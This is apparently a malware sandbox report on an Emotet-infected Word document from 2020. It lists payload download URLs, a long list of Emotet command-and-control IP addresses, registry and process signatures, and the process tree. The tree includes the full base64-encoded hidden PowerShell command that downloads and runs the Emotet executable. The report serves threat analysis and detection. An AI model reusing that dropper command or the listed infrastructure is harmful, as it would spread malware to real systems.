Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
24/01/2020, 02:39
General
Malware Config
Extracted
http://wpprimebox.com/support/D03jG8Ic/
http://wp.ewa-iot.com/plesk/w9v13py/
http://www.astrologerpanchmukhijyotish.com/wp-includes/ucflLPxgy/
https://basepresupuestos.com/fonts/aq/
https://camraiz.com/wp-admin/GIrEDD/
Extracted
emotet
108.6.140.26:80
70.184.9.39:8080
222.144.13.169:80
45.55.65.123:8080
217.160.19.232:8080
176.9.43.37:8080
5.199.130.105:7080
202.175.121.202:8090
91.205.215.66:443
120.150.246.241:80
74.130.83.133:80
105.247.123.133:8080
190.12.119.180:443
37.187.72.193:8080
190.146.205.227:8080
200.21.90.5:443
206.189.112.148:8080
92.222.216.44:8080
24.94.237.248:80
2.237.76.249:80
87.81.51.125:80
209.97.168.52:8080
159.65.25.128:8080
87.106.136.232:8080
121.88.5.176:443
46.105.131.69:443
169.239.182.217:8080
104.131.44.150:8080
101.187.237.217:80
103.86.49.11:8080
45.33.49.124:443
110.36.217.66:8080
160.16.215.66:8080
178.153.176.124:80
78.142.114.69:80
217.160.182.191:8080
190.117.126.169:80
205.185.117.108:8080
189.212.199.126:443
62.75.187.192:8080
139.130.241.252:443
87.106.139.101:8080
201.184.105.242:443
139.130.242.43:80
64.40.250.5:80
108.179.206.219:8080
101.187.197.33:443
181.143.126.170:80
85.152.174.56:80
190.53.135.159:21
100.6.23.40:80
186.86.247.171:443
75.114.235.105:80
58.171.42.66:8080
60.231.217.199:8080
85.67.10.190:80
47.6.15.79:80
62.138.26.28:8080
103.97.95.218:80
190.143.39.231:80
178.20.74.212:80
190.55.181.54:443
5.32.55.214:80
59.103.164.174:80
42.200.226.58:80
201.229.45.222:8080
91.73.197.90:80
104.236.246.93:8080
221.165.123.72:80
31.172.240.91:8080
180.92.239.110:8080
118.185.7.132:80
46.105.131.87:80
209.146.22.34:443
95.128.43.213:8080
93.147.141.5:443
24.164.79.147:8080
211.63.71.72:8080
210.6.85.121:80
181.126.70.117:80
105.27.155.182:80
182.176.132.213:8090
74.101.225.121:443
200.71.200.4:443
78.24.219.147:8080
177.239.160.121:80
68.114.229.171:80
78.189.180.107:80
50.116.86.205:8080
47.156.70.145:80
211.192.153.224:80
90.69.145.210:8080
183.102.238.69:465
72.189.57.105:80
68.172.243.146:80
152.168.248.128:443
101.187.134.207:8080
76.104.80.47:443
190.114.244.182:443
78.101.70.199:443
190.220.19.82:443
73.11.153.178:8080
206.81.10.215:8080
195.244.215.206:80
78.186.5.109:443
209.141.54.221:8080
60.250.78.22:443
149.202.153.252:8080
104.131.11.150:8080
24.105.202.216:443
201.173.217.124:443
181.13.24.82:80
188.0.135.237:80
179.13.185.19:80
5.196.74.210:8080
88.249.120.205:80
178.237.139.83:8080
47.180.91.213:80
87.230.19.21:8080
85.105.205.77:8080
24.196.49.98:80
120.151.135.224:80
62.75.141.82:80
223.197.185.60:80
64.53.242.181:8080
200.116.145.225:443
47.6.15.79:443
Signatures
-
Executes dropped EXE 4 IoCs
pid Process 4716 648.exe 4696 648.exe 4384 volcyan.exe 4376 volcyan.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 4696 648.exe 4376 volcyan.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3676 2244 Powershell.exe 73 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3676 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3676 Powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File renamed C:\Users\Admin\648.exe => C:\Windows\SysWOW64\volcyan.exe 648.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4952 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4952 WINWORD.EXE 4716 648.exe 4696 648.exe 4384 volcyan.exe 4376 volcyan.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3676 wrote to memory of 4716 3676 Powershell.exe 80 PID 4716 wrote to memory of 4696 4716 648.exe 81 PID 4384 wrote to memory of 4376 4384 volcyan.exe 83
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\423b7b9ea002165c61b8db1259dd9bbad8a0dae6fc5401a591d206e01c4cbe05.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4952
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABPAHcAaQBpAHEAbQBwAHAAdwA9ACcASAB6AHAAYQB3AHMAZgBvAHEAJwA7ACQASgBpAGMAcABiAHkAdwBrAGEAdABxACAAPQAgACcANgA0ADgAJwA7ACQAUQBiAHgAYQBxAGkAdgBjAD0AJwBPAGIAdQByAHoAaABoAGUAegAnADsAJABNAHMAdwB3AHoAbwB1AHEAcgB6AGgAeAB1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABKAGkAYwBwAGIAeQB3AGsAYQB0AHEAKwAnAC4AZQB4AGUAJwA7ACQAWABpAGIAagB2AG4AaQBvAGMAcgBxAD0AJwBSAGcAcwBtAHoAZwBhAHAAdwBhAGwAbwAnADsAJABMAHcAZgBuAGcAYQB4AHkAcwBtAD0ALgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABuAEUAVAAuAHcARQBCAGMATABpAGUAbgB0ADsAJABCAHoAcABtAGMAaABzAG8AZgA9ACcAaAB0AHQAcAA6AC8ALwB3AHAAcAByAGkAbQBlAGIAbwB4AC4AYwBvAG0ALwBzAHUAcABwAG8AcgB0AC8ARAAwADMAagBHADgASQBjAC8AKgBoAHQAdABwADoALwAvAHcAcAAuAGUAdwBhAC0AaQBvAHQALgBjAG8AbQAvAHAAbABlAHMAawAvAHcAOQB2ADEAMwBwAHkALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBhAHMAdAByAG8AbABvAGcAZQByAHAAYQBuAGMAaABtAHUAawBoAGkAagB5AG8AdABpAHMAaAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AdQBjAGYAbABMAFAAeABnAHkALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGEAcwBlAHAAcgBlAHMAdQBwAHUAZQBzAHQAbwBzAC4AYwBvAG0ALwBmAG8AbgB0AHMALwBhAHEALwAqAGgAdAB0AHAAcwA6AC8ALwBjAGEAbQByAGEAaQB6AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBHAEkAcgBFAEQARAAvACcALgAiAHMAcABsAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVAB5AGcAbAByAHkAbQB0AHQAPQAnAFUAdQBuAG8AaABwAHkAeQB6AGEAdABwACcAOwBmAG8AcgBlAGEAYwBoACgAJABHAHIAdwB6AGQAaQBsAGYAdQBqAHQAcgAgAGkAbgAgACQAQgB6AHAAbQBjAGgAcwBvAGYAKQB7AHQAcgB5AHsAJABMAHcAZgBuAGcAYQB4AHkAcwBtAC4AIgBkAG8AdwBOAGwAbwBgAEEARABgAEYASQBsAEUAIgAoACQARwByAHcAegBkAGkAbABmAHUAagB0AHIALAAgACQATQBzAHcAdwB6AG8AdQBxAHIAegBoAHgAdQApADsAJABTAG0AegBhAGgAcQB1AHAAagA9ACcAVgBmAHkAZQBpAHgAbQB3AHUAZgBtACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQATQBzAHcAdwB6AG8AdQBxAHIAegBoAHgAdQApAC4AIgBMAGUATgBgAEcAdABIACIAIAAtAGcAZQAgADIAOQA5ADUAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABhAFIAdAAiACgAJABNAHMAdwB3AHoAbwB1AHEAcgB6AGgAeAB1ACkAOwAkAEwAbgBwAGcAZQB6AGkAbQBnAHkAbAA9ACcATQBmAHcAZQBsAHkAeQBtAGoAegB0AHIAJwA7AGIAcgBlAGEAawA7ACQAUwB6AGEAZwB6AHkAbQB3AGMAPQAnAEUAcABnAGoAegB6AHQAdgBlAGEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQBhAG8AYwBjAGIAbgB3AHAAYgB0AHAAbQA9ACcATABuAGcAcQBjAHIAdgBoAGoAcgBkAGsAJwA=1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Users\Admin\648.exe"C:\Users\Admin\648.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Users\Admin\648.exe--957c63983⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4696
-
-
-
C:\Windows\SysWOW64\volcyan.exe"C:\Windows\SysWOW64\volcyan.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\SysWOW64\volcyan.exe--3a2c0d0c2⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
PID:4376
-